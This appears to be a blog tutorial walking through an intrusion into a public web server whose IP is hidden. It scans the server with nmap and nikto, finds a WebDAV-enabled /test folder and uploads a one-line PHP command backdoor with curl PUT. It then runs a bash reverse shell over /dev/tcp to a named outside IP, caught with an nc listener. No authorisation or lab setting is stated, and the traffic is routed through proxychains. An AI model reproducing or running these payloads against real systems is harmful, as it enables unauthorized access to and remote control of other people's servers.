PHP Backdoor + Reverse Shell on Vulnerable Website

The goal here is show one method for examining a public IP address to determine if it is running any vulnerable services that are exploitable.

Target IP: X.X.X.X (IP address purposely hidden)

First we have to do some basic discovery on our IP to determine what services are running. The nmap command used is: proxychains nmap <ip address> -v -Pn -sT -A

Capture0.1

We can see that the target IP is listening on ports 22 (ssh) and 80 (web). For now, we’ll focus on port 80.

Next we scan the website using nikto, dirb, uniscan and w3af.  Nikto didn’t really turn up much, but dirb tells us that a folder exists called test. Uniscan also turned up some helpful info but each tool is different and useful in varying ways depending on what you’re trying to accomplish.  I recommend trying them all against your target.

Capture1

Now that we have a know a bit more about our target, we can use curl to glean more useful information about the “test” folder:

proxychains curl -X OPTIONS -v http://X.X.X.X/test/

Capture2

Based on the response of the OPTIONS verb on the /test directory, it looks like it has WebDAV enabled. Using “PUT” we may be able to upload a backdoor to this folder.

First, we need to create a new file on our box and add the following line:

<?php echo system($_GET[“cmd”]); ?>

Next, we attempt to upload our php backdoor to our target using the following command:

proxychains curl –upload-file /root/Desktop/cmd.php -v –url http://X.X.X.X/test/cmd.php -0 –http1.0

Capture3

We can see that our backdoor was successfully uploaded.  Now, we can use our backdoor to (hopefully) run commands directly on the webserver.  For example, running the following command from a web browser will give us a directory listing:

X.X.X.X/test/cmd.php?cmd=ls%20/

Capture4Using curl, we could also upload a bash shell script and then use our backdoor to give us a reverse shell on the webserver. The script file contains the following code:

exec 5<>/dev/tcp/52.37.49.217/443
cat <&5 | while read line; do $line 2>&5 >&5; done

Now we upload it:

Capture6

Now on our public facing box, and before we can receive our shell, we need to setup a listener on port 443 using the following command:

nc -lvp 443

Capture9

Then, at the website, we can now run our script via our backdoor:

Capture8

We should now have our reverse bash shell, as seen below:

Capture10

 

Advertisements

One thought on “PHP Backdoor + Reverse Shell on Vulnerable Website

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s